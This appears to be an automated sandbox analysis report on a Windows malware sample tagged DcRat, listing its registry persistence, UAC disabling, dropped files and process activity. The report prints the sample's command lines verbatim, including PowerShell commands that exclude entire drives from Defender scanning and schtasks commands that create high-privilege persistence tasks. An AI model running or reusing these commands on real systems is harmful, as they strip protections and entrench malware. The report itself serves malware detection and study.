Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default\\Desktop\\dllhost.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\MSOCache\\All Users\\wininit.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Windows\\system\\wininit.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\dwm.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\MSOCache\\All Users\\wininit.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\Tasks\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6 = "\"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Idle.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	services.exe

Drops file in Program Files directory 24 IoCs

description	ioc	Process
File created	C:\Program Files\Internet Explorer\it-IT\Idle.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files\Internet Explorer\en-US\dwm.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files\Internet Explorer\it-IT\RCXA11F.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files\Windows Defender\es-ES\winlogon.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\winlogon.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\c5b4cb5e9653cc	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\services.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files\Internet Explorer\it-IT\Idle.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\cc11b995f2a76d	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files\Internet Explorer\en-US\RCX9893.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\RCX88B4.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\winlogon.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\RCX9CAA.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files\Internet Explorer\en-US\6cb0b6c459d5d3	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\c5b4cb5e9653cc	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\winlogon.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\RCX9612.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\services.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files\Windows Defender\es-ES\cc11b995f2a76d	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files\Internet Explorer\en-US\dwm.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Program Files\Internet Explorer\it-IT\6ccacd8608530f	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\RCX8643.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\c5b4cb5e9653cc	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Windows\system\wininit.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Windows\ModemLogs\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Windows\Tasks\services.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Windows\Tasks\services.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Windows\system\56085415360792	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File created	C:\Windows\ModemLogs\c75fe4741891b9	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Windows\Tasks\RCX8AB8.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Windows\system\RCX8F9A.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Windows\system\wininit.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Windows\ModemLogs\RCX940E.tmp	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
File opened for modification	C:\Windows\ModemLogs\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3052	schtasks.exe
2608	schtasks.exe
1536	schtasks.exe
2708	schtasks.exe
1020	schtasks.exe
1668	schtasks.exe
2516	schtasks.exe
1500	schtasks.exe
2368	schtasks.exe
1864	schtasks.exe
304	schtasks.exe
2276	schtasks.exe
436	schtasks.exe
2976	schtasks.exe
2940	schtasks.exe
3060	schtasks.exe
840	schtasks.exe
1504	schtasks.exe
2212	schtasks.exe
3036	schtasks.exe
2156	schtasks.exe
2684	schtasks.exe
2664	schtasks.exe
2704	schtasks.exe
1604	schtasks.exe
2196	schtasks.exe
2668	schtasks.exe
3004	schtasks.exe
1004	schtasks.exe
2380	schtasks.exe
2192	schtasks.exe
1068	schtasks.exe
2460	schtasks.exe
2288	schtasks.exe
2504	schtasks.exe
2248	schtasks.exe
568	schtasks.exe
2428	schtasks.exe
1592	schtasks.exe
2148	schtasks.exe
1384	schtasks.exe
1856	schtasks.exe
2764	schtasks.exe
316	schtasks.exe
1524	schtasks.exe
3028	schtasks.exe
1804	schtasks.exe
896	schtasks.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
2944	powershell.exe
2832	powershell.exe
2684	powershell.exe
1416	powershell.exe
2064	powershell.exe
1452	powershell.exe
584	powershell.exe
2312	powershell.exe
1684	powershell.exe
840	powershell.exe
2204	powershell.exe
2876	powershell.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe
2960	services.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2960	services.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2960	services.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 2296 wrote to memory of 1416	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	79
PID 2296 wrote to memory of 1416	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	79
PID 2296 wrote to memory of 1416	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	79
PID 2296 wrote to memory of 2832	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	80
PID 2296 wrote to memory of 2832	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	80
PID 2296 wrote to memory of 2832	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	80
PID 2296 wrote to memory of 2684	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	81
PID 2296 wrote to memory of 2684	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	81
PID 2296 wrote to memory of 2684	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	81
PID 2296 wrote to memory of 2204	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	82
PID 2296 wrote to memory of 2204	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	82
PID 2296 wrote to memory of 2204	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	82
PID 2296 wrote to memory of 2944	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	83
PID 2296 wrote to memory of 2944	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	83
PID 2296 wrote to memory of 2944	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	83
PID 2296 wrote to memory of 2876	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	84
PID 2296 wrote to memory of 2876	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	84
PID 2296 wrote to memory of 2876	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	84
PID 2296 wrote to memory of 2064	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	85
PID 2296 wrote to memory of 2064	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	85
PID 2296 wrote to memory of 2064	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	85
PID 2296 wrote to memory of 2312	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	86
PID 2296 wrote to memory of 2312	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	86
PID 2296 wrote to memory of 2312	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	86
PID 2296 wrote to memory of 1452	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	87
PID 2296 wrote to memory of 1452	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	87
PID 2296 wrote to memory of 1452	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	87
PID 2296 wrote to memory of 1684	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	88
PID 2296 wrote to memory of 1684	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	88
PID 2296 wrote to memory of 1684	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	88
PID 2296 wrote to memory of 840	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	89
PID 2296 wrote to memory of 840	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	89
PID 2296 wrote to memory of 840	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	89
PID 2296 wrote to memory of 584	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	90
PID 2296 wrote to memory of 584	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	90
PID 2296 wrote to memory of 584	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	90
PID 2296 wrote to memory of 2276	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	101
PID 2296 wrote to memory of 2276	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	101
PID 2296 wrote to memory of 2276	2296	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe	101
PID 2276 wrote to memory of 2472	2276	cmd.exe	105
PID 2276 wrote to memory of 2472	2276	cmd.exe	105
PID 2276 wrote to memory of 2472	2276	cmd.exe	105
PID 2276 wrote to memory of 2960	2276	cmd.exe	106
PID 2276 wrote to memory of 2960	2276	cmd.exe	106
PID 2276 wrote to memory of 2960	2276	cmd.exe	106

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	services.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
"C:\Users\Admin\AppData\Local\Temp\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe"
1⤵
- DcRat
- Modifies WinLogon for persistence
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vmrgCp0lFx.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:2472
- - C:\Windows\Tasks\services.exe
    "C:\Windows\Tasks\services.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:2960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\audiodg.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2664

C:\Windows\system32\schtasks.exe
